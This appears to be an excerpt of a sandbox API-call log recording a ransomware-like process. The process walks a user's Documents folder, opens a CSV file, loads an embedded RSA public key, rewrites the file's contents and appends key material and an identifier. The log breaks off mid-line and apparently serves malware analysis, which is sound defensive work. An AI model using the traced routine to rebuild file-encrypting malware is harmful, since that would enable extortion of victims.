[0246.470] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.471] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bb2c070, ftCreationTime.dwHighDateTime=0x1d5c59e, ftLastAccessTime.dwLowDateTime=0x4e2cf680, ftLastAccessTime.dwHighDateTime=0x1d5b6d0, ftLastWriteTime.dwLowDateTime=0x4e2cf680, ftLastWriteTime.dwHighDateTime=0x1d5b6d0, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C1atkbdfiQ5w7tOBkMk-.csv", cAlternateFileName="C1ATKB~1.CSV")) returned 1 [0246.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.471] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\C1atkbdfiQ5w7tOBkMk-.csv") returned=".csv" [0246.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\o6M1E\\C1atkbdfiQ5w7tOBkMk-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\o6m1e\\c1atkbdfiq5w7tobkmk-.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.472] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=6406) returned 1 [0246.472] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.475] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.475] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.477] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.477] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x1906, lpOverlapped=0x0) returned 1 [0246.478] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.478] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.478] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.478] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.479] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.479] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.479] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.479] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.479] GetLastError () returned 0x0 [0246.479] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.480] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.480] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.480] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.480] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1910) returned 0x3b99d50 [0246.480] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0246.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b900c0 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89180 [0246.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90108 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89198 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891c8 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89228 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891e0 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7b830 [0246.481] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89228 | out: hHeap=0x620000) returned 1 [0246.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0246.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89228 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891e0 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b891c8 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b80030 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7fce8 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b80030 | out: hHeap=0x620000) returned 1 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89228 | out: hHeap=0x620000) returned 1 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0246.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.482] GetCurrentThreadId () returned 0x5b4 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8af78 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0246.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.483] GetCurrentThreadId () returned 0x5b4 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89228 [0246.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891c8 [0246.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x33734f8 [0246.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891e0 [0246.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0246.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891b0 [0246.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89240 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89210 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891f8 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89258 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891f8 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891f8 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89210 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891c8 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0246.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89228 | out: hHeap=0x620000) returned 1 [0246.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b80030 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89258 | out: hHeap=0x620000) returned 1 [0246.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7fe00 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ff18 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b80030 | out: hHeap=0x620000) returned 1 [0246.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ff18 | out: hHeap=0x620000) returned 1 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0246.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fe00 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891f8 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891b0 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89198 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90108 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fce8 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0246.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.488] WriteFile (in: hFile=0x644, lpBuffer=0x3b99d50*, nNumberOfBytesToWrite=0x1901, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b99d50*, lpNumberOfBytesWritten=0x39afb14*=0x1901, lpOverlapped=0x0) returned 1 [0246.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b99d50 | out: hHeap=0x620000) returned 1 [0246.488] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1906, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.488] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0246.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0246.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0246.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa00 [0246.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0246.488] WriteFile (in: hFile=0x644, lpBuffer=0x346fa00*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa00*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0246.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 